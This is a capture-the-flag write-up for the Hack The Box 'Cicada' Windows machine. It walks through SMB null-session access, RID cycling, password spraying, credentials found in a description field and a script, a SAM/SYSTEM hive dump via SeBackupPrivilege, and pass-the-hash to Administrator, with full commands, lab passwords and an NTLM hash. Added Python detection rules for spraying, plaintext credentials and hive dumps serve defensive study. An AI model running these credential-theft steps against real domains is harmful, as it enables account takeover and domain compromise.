[HTB] Cicada

OS: Windows
Difficulty: Easy
Author: theblxckcicada
Release Date: September 28, 2024

Video Walkthrough

Recon

Nmap

nmap -T4 -A -p- 10.10.11.35 -o initial_scan.nmap 
Nmap scan report for 10.10.11.35
Host is up (0.041s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-04 05:06:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
59896/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-04T05:07:09
|_ start_date: N/A
|_clock-skew: 6h59m59s

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 40.58 ms 10.10.14.1
2 41.44 ms 10.10.11.35

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 3 22:07:49 2025 -- 1 IP address (1 host up) scanned in 189.08 seconds

User

SMB Without Password

Listing the shares without a password (a null session) reveals two non-default shares:

smbclient -L \\\\10.10.11.35\\

We can access the HR share and download a file called “Notice from HR.txt”

smbclient \\\\10.10.11.35\\HR
get "Notice from HR.txt"

From the file's content, we get a password:

Cicada$M6Corpb*@Lp#nZp!8

RID Enumeration

With the obtained password, we can use ridenum to enumerate domain users through RID cycling:

ridenum 10.10.11.35 500 5000 '' 'Cicada$M6Corpb*@Lp#nZp!8'

ridenum writes the discovered usernames to a file. We can use NetExec to check whether any of these users uses the password we found:

netexec smb 10.10.11.35 -u 10.10.11.35_users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

The user michael.wrightson uses the password Cicada$M6Corpb*@Lp#nZp!8, so we can authenticate as him to enumerate more users:

netexec smb 10.10.11.35 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
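The two steps above (a null session listing shares, then one password tried against a list of enumerated users) both leave a distinctive trace in the domain controller's Security log, which is the defender's side of this section. The following Python is an added example written for this page, not code from the writeup or from NetExec. It runs two rules over events modelled on the 4624/4625 fields (EventID, TimeCreated, TargetUserName, LogonType, IpAddress); SAMPLE_EVENTS and the usernames and addresses in it are constructed for the demo.

```python
"""Null-session and password-spray detection over Windows logon events.

Added example, not part of the original writeup. Events are dicts that mirror
the fields of Security event 4624 (successful logon) and 4625 (failed logon).
SAMPLE_EVENTS is constructed for this demo and is not real log data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

ANONYMOUS = "ANONYMOUS LOGON"

# Constructed sample: 10.10.14.5 first opens a null session, then tries one
# password against five accounts in twenty seconds and logs on as a sixth.
# 10.10.14.9 is a user mistyping their own password twice; not a spray.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2025-03-04T05:05:00", "TargetUserName": ANONYMOUS, "LogonType": 3, "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:10:00", "TargetUserName": "a.adams", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:10:05", "TargetUserName": "b.brown", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:10:10", "TargetUserName": "c.clark", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:10:15", "TargetUserName": "d.davis", "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:10:20", "TargetUserName": "e.evans", "IpAddress": "10.10.14.5"},
    {"EventID": 4624, "TimeCreated": "2025-03-04T05:10:25", "TargetUserName": "michael.wrightson", "LogonType": 3, "IpAddress": "10.10.14.5"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:11:00", "TargetUserName": "f.foster", "IpAddress": "10.10.14.9"},
    {"EventID": 4625, "TimeCreated": "2025-03-04T05:11:30", "TargetUserName": "f.foster", "IpAddress": "10.10.14.9"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def null_session_sources(events):
    """Sources that obtained a network logon (type 3) as ANONYMOUS LOGON, which
    is what the share listing without a password looks like on the DC."""
    return sorted({e["IpAddress"] for e in events
                   if e["EventID"] == 4624 and e.get("LogonType") == 3
                   and e["TargetUserName"].upper() == ANONYMOUS})


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """{source_ip: {"first_seen": iso, "accounts": [...]}} for every source whose
    failed logons hit at least `min_accounts` distinct accounts inside `window`.
    Many accounts from one source is a spray; many attempts on one account is
    a brute force, which this rule deliberately ignores."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append((_ts(e), e["TargetUserName"]))

    hits = {}
    for src, attempts in failures.items():
        attempts.sort()
        start = 0
        # Sliding window over this source's time-sorted failures.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            accounts = {user for _, user in attempts[start:end + 1]}
            if len(accounts) >= min_accounts:
                hits[src] = {"first_seen": attempts[start][0].isoformat(),
                             "accounts": sorted(accounts)}
                break
    return hits


def spray_successes(events, hits):
    """For each flagged source, the accounts it logged on with after the spray
    began: the credential the attacker validated, and the first one to reset."""
    out = {}
    for src, info in hits.items():
        started = datetime.fromisoformat(info["first_seen"])
        out[src] = sorted({e["TargetUserName"] for e in events
                           if e["EventID"] == 4624 and e["IpAddress"] == src
                           and _ts(e) >= started
                           and e["TargetUserName"].upper() != ANONYMOUS})
    return out


if __name__ == "__main__":
    print("null sessions from:", null_session_sources(SAMPLE_EVENTS))
    hits = detect_spray(SAMPLE_EVENTS)
    for src, info in hits.items():
        print(f"spray from {src} at {info['first_seen']}: {len(info['accounts'])} accounts")
    for src, users in spray_successes(SAMPLE_EVENTS, hits).items():
        print(f"  validated credentials from {src}: {users}")
```

Event 4625 on the DC only covers logons against the DC itself; a spray over Kerberos shows up as 4771 (pre-authentication failed) and NTLM validation for member servers as 4776, so in production the same windowing is applied to those events as well. The window and threshold are the only tuning knobs, and a spray over a user list the size ridenum produces above blows past any sensible value within seconds.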


The password for the user david.orelious is stored in that user's description attribute:

david.orelious:aRt$Lp#7t*VQ!3

Enumerating shares with the new credentials:

netexec smb 10.10.11.35 -d cicada.htb -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares

This user has READ access to the DEV share, which contains a PowerShell script called Backup_script.ps1:

smbclient \\\\10.10.11.35\\DEV -U david.orelious
get Backup_script.ps1

The script contains hard-coded credentials for emily.oscars:

emily.oscars:Q!3@Lp#M6b*7t*Vt
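Both footholds in this section come from the same defensive gap: a password written somewhere that any authenticated user can read, first a user object's description attribute and then a script on a share. The scanner below is an added example written for this page, not code from the writeup; it runs the same password heuristics over AD user records and over PowerShell source. SAMPLE_USERS, SAMPLE_SCRIPT and every value in them are constructed. Feeding it real data is the reader's job, for instance the output of Get-ADUser -Filter * -Properties description for the users and a walk of the share for the scripts.

```python
"""Plaintext-credential scanner for AD description attributes and scripts.

Added example, not part of the original writeup. Users are plain dicts with
sAMAccountName and description; scripts are passed as text. The sample data at
the bottom is constructed for the demo.
"""
import re

# "password is X", "pwd: X", "pass=X" in free text; token of 6+ non-space chars.
KEYWORD_RE = re.compile(
    r"(?i)\b(pass(?:word|wd)?|pwd)\b(?:\s*(?:is|was|:|=|-))?\s*['\"]?([^\s'\"]{6,})")
# PowerShell's explicit plaintext-to-SecureString conversion.
SECURESTRING_RE = re.compile(
    r"(?i)ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]\s+-AsPlainText")
# A quoted literal assigned to a variable whose name contains pass/pwd.
ASSIGN_RE = re.compile(
    r"(?i)\$?\w*(?:pass(?:word|wd)?|pwd)\w*\s*=\s*['\"]([^'\"]{6,})['\"]")


def looks_like_password(token):
    """Require three of four character classes to keep prose out of the results."""
    classes = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")
    return sum(1 for c in classes if re.search(c, token)) >= 3


def scan_descriptions(users):
    """Findings as (source, identity, secret) for description attributes."""
    findings = []
    for u in users:
        for m in KEYWORD_RE.finditer(u.get("description") or ""):
            if looks_like_password(m.group(2)):
                findings.append(("ad-description", u["sAMAccountName"], m.group(2)))
    return findings


def scan_script(name, text):
    """Findings as (source, file:line, secret) for a script body."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SECURESTRING_RE.finditer(line):
            findings.append(("script", f"{name}:{lineno}", m.group(1)))
        for m in ASSIGN_RE.finditer(line):
            if looks_like_password(m.group(1)):
                findings.append(("script", f"{name}:{lineno}", m.group(1)))
    return findings


def scan_all(users, scripts):
    """Run both scanners; `scripts` maps a file name to its contents."""
    findings = scan_descriptions(users)
    for name, text in scripts.items():
        findings.extend(scan_script(name, text))
    return findings


SAMPLE_USERS = [  # constructed
    {"sAMAccountName": "svc.helpdesk", "description": "Helpdesk contact, ext 4410"},
    {"sAMAccountName": "t.temp", "description": "Temp contractor, password is Dem0$Pa55!"},
    {"sAMAccountName": "m.muster", "description": "Password reset required at next logon"},
]

SAMPLE_SCRIPT = r'''# constructed backup script
$sourceDirectory = "C:\smb"
$backupPwd = "Plain$Text1"
$password = ConvertTo-SecureString "Dem0$Scr1pt!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("demo\svc_backup", $password)
'''


if __name__ == "__main__":
    for source, where, secret in scan_all(SAMPLE_USERS, {"Backup_script.ps1": SAMPLE_SCRIPT}):
        print(f"{source:15} {where:25} {secret[:3]}***")
```

The expressions are deliberately loose; the three-of-four character-class check is what keeps sentences like "Password reset required" out of the output, so tune both to local naming conventions. Anything the scanner finds should be treated as already compromised and rotated, because every domain user could have read it.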

Now we can get a shell as emily.oscars using evil-winrm:

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

PrivEsc

SeBackupPrivilege

Checking the current user's privileges shows that SeBackupPrivilege is enabled:

whoami /priv

Searching for privilege escalation with this privilege leads to a blog post describing the technique.
SeBackupPrivilege lets a process read files and registry hives regardless of their ACLs, so with it we can save a backup of the SAM and SYSTEM hives, transfer them to our machine and extract the secrets stored in them.

So the first step is to save the backup of both hives (SAM and SYSTEM)

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

And then transfer both to our machine

cd Temp
download sam
download system

With both files on our machine, we can run pypykatz to extract the secrets from the hives:

pypykatz registry --sam sam system

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

With the Administrator NTLM hash, we can get a shell using evil-winrm's pass-the-hash option:

evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
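From the blue-team side, the whole chain above (SeBackupPrivilege, reg save of SAM and SYSTEM, offline extraction, pass-the-hash) produces only a handful of events on the domain controller, and the two worth alerting on are a reg.exe save of a sensitive hive and any use of SeBackupPrivilege by something that is not the backup agent. The following Python is an added example for this page, not code from the writeup; the event dicts mirror the 4688 and 4674 field names, and SAMPLE_EVENTS together with the allow-listed agent path are constructed.

```python
"""Detection for the SeBackupPrivilege hive-dump chain.

Added example, not part of the original writeup. Two rules run over Security
events represented as dicts: process creation (4688, or Sysmon event 1, which
carries the same CommandLine field) where reg.exe saves or exports the SAM,
SECURITY or SYSTEM hive, and sensitive-privilege use (4674) where
SeBackupPrivilege is exercised by a process outside the backup-agent allow list.
"""
import re

# reg.exe save/export with or without the .exe suffix and surrounding quotes.
REG_SAVE_RE = re.compile(r'(?i)(?:^|[\\\s])reg(?:\.exe)?"?\s+(save|export)\s+')
# The hives that hold credential material.
HIVE_RE = re.compile(r"(?i)\bhklm\\(sam|security|system)\b")

# Backup software that legitimately holds SeBackupPrivilege (placeholder path).
ALLOWED_BACKUP_IMAGES = {r"c:\program files\examplebackup\agent.exe"}

SAMPLE_EVENTS = [  # constructed, modelled on the commands run in the writeup
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam c:\Temp\sam"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save hklm\system c:\Temp\system'},
    {"EventID": 4688, "SubjectUserName": "j.doe",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"EventID": 4674, "SubjectUserName": "emily.oscars",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PrivilegeList": "SeBackupPrivilege", "ObjectName": r"\REGISTRY\MACHINE\SAM"},
    {"EventID": 4674, "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Program Files\ExampleBackup\agent.exe",
     "PrivilegeList": "SeBackupPrivilege", "ObjectName": r"\REGISTRY\MACHINE\SYSTEM"},
]


def hive_save_alerts(events):
    """(rule, user, hive) for every reg.exe save/export of a sensitive hive."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4688:
            continue
        cmd = e.get("CommandLine", "")
        if REG_SAVE_RE.search(cmd):
            for hive in HIVE_RE.findall(cmd):
                alerts.append(("reg-hive-save", e["SubjectUserName"], hive.lower()))
    return alerts


def backup_privilege_alerts(events, allowed=ALLOWED_BACKUP_IMAGES):
    """(rule, user, process) when SeBackupPrivilege is used outside the allow list."""
    alerts = []
    for e in events:
        if e.get("EventID") != 4674:
            continue
        if "sebackupprivilege" not in e.get("PrivilegeList", "").lower():
            continue
        image = e.get("ProcessName", "").lower()
        if image not in allowed:
            alerts.append(("sebackup-use", e["SubjectUserName"], image))
    return alerts


def run_rules(events):
    """All alerts from both rules, in event order per rule."""
    return hive_save_alerts(events) + backup_privilege_alerts(events)


if __name__ == "__main__":
    for rule, user, detail in run_rules(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {detail}")
```

4688 only carries the command line when "Include command line in process creation events" is enabled (Sysmon event 1 records it by default), and 4674 requires the Sensitive Privilege Use audit subcategory. The mitigation is simpler than the detection: on a domain controller SeBackupPrivilege is effectively administrator-level, so the Backup Operators group should stay empty there and the right should never be granted to ordinary user accounts.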

Rooted :)